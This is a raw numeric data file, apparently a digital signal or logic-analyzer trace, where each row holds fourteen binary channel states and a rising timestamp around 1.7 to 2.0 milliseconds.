1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7199480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7199720e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7199960e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7200280e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7200480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7200760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7201000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7201240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7201480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7201720e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7201960e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7202240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7202480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7202760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7203000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7203240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7203480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7203720e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7203960e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7204240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7204480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7204760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7205000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7205240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7205480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7205720e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7205960e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7206240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7206480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7206760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7207000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7207240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7207480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7207720e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7207960e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7208240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7208480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7208760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7209000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7209240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7209480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7209720e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7209960e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7210240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7210480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7210760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7211000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7211240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7211480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7211720e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7211960e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7212240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7212480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7212760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7213000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7213240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7213480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7213720e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7213960e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7214240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7214480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7214760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7215000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7215240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7215480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7215720e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7215960e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7216240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7216480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7216760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7217000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7217240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7217480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7217720e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7217960e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7218240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7218480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7218720e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7218960e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7219200e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7219480e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,1,1.8464000e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,1,1.8465960e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,1,1.8466160e-03 0,1,1,1,1,0,0,0,0,0,0,1,0,1,1.8466440e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,1,1.8466680e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,1,1.8469400e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,1,1.8469640e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,1,1.8469680e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,1,1.8470120e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,1,1.8470360e-03 0,1,1,1,1,1,0,0,0,0,0,0,0,1,1.8470440e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,1,1.8470480e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,1,1.8470640e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,1,1.8470880e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,1,1.8470920e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,1,1.8471400e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,1,1.8471640e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,1,1.8471720e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,1,1.8471880e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,1,1.8472120e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,1,1.8472200e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8472320e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8472640e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8472880e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8472960e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8473160e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8473400e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8473440e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8473880e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8474120e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8474200e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8474360e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8474640e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8474880e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8475160e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8475400e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8475640e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8476120e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8476360e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8476440e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8476920e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8477160e-03 0,1,1,1,1,1,0,0,0,0,0,0,0,0,1.8477200e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8477240e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8477400e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8477640e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8477680e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8478120e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8478360e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8478440e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8478600e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8478840e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8479160e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8479360e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8479640e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8479880e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8480120e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8480360e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8480400e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8480840e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8481120e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8481160e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8481360e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8481600e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8481640e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8482120e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8482360e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8482440e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8482600e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8482840e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8483080e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8483360e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8483640e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8483880e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8484360e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8484600e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8484680e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8485120e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8485360e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8485440e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8485640e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8485880e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8486360e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8486600e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8486840e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8487160e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8487440e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8487680e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8487960e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8488200e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8488440e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8488680e-03 0,1,1,1,1,0,0,0,0,1,0,0,0,0,1.8488720e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8488760e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8489200e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8489440e-03 0,1,1,1,1,1,0,0,0,0,0,0,0,0,1.8489480e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8489520e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8489680e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8489960e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8490200e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8490440e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8490480e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8490920e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8491160e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8491240e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8491440e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8491680e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8491960e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8492200e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8492440e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8492680e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8492920e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8493160e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8493440e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8493680e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8493720e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8494200e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8494440e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8494520e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8494920e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8495160e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8495440e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8495680e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8495960e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8496200e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8496440e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8496680e-03 0,1,1,1,1,0,0,0,0,1,0,0,0,0,1.8496720e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8496760e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8497200e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8497440e-03 0,1,1,1,1,1,0,0,0,0,0,0,0,0,1.8497480e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8497520e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8497680e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8497960e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8498200e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8498440e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8498680e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8498920e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8499160e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8499440e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8499680e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8499960e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8500440e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8500680e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8500920e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8501160e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8501240e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8501440e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8501680e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8501960e-03 0,1,1,1,1,0,0,0,0,1,0,0,0,0,1.8502200e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8502240e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8502680e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8502920e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8503000e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8503160e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8503440e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8503680e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8503960e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8504200e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8504440e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8504680e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8504920e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8505160e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8505440e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8505680e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8505960e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8506200e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8506440e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8506680e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8506920e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8507160e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8507440e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8507680e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8507960e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8508200e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8508440e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8508680e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8508920e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8509160e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8509440e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8509680e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8509960e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8510200e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8510440e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8510680e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8510920e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8511160e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8511440e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8511680e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8511960e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8512200e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8512440e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8512680e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8512920e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8513160e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8513440e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8513680e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8513960e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8514200e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8514440e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8514680e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8514920e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8515160e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8515440e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8515680e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8515960e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8516200e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8516440e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8516680e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8516920e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8517160e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8517440e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8517680e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8517960e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8518200e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8518440e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8518680e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8518920e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8519160e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8519440e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8519680e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8519960e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8520200e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8520440e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8520680e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8520920e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8521160e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8521440e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8521680e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8521960e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8522200e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8522440e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8522680e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8522920e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8523160e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8523440e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8523680e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8523960e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8524200e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8524440e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8524680e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8524920e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8525160e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8525440e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8525680e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8525960e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8526200e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8526440e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8526680e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8526920e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8527160e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8527440e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8527680e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8527960e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8528200e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8528440e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8528680e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8528920e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8529160e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8529440e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8529680e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8529960e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8530200e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8530440e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8530680e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8530920e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8531160e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8531440e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8531680e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8531960e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8532200e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8532440e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8532680e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8532920e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8533160e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8533440e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8533680e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8533960e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8534200e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8534440e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8534680e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8534920e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8535160e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8535440e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8535680e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8535960e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8536200e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8536440e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8536760e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8537040e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8537320e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8537560e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8537800e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8538040e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,1,1.9783040e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,1,1.9785000e-03 1,1,1,1,1,0,0,0,0,0,0,1,0,1,1.9785400e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,1,1.9785600e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9791400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9796440e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.9796760e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.9796800e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.9797000e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.9797240e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9797320e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9797800e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.9798040e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.9798280e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.9798520e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9798600e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9799000e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9799240e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.9799320e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.9799520e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.9799760e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9799840e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9800040e-03 1,1,1,1,1,0,0,0,0,1,0,0,0,0,1.9800280e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.9800320e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.9800520e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.9800760e-03 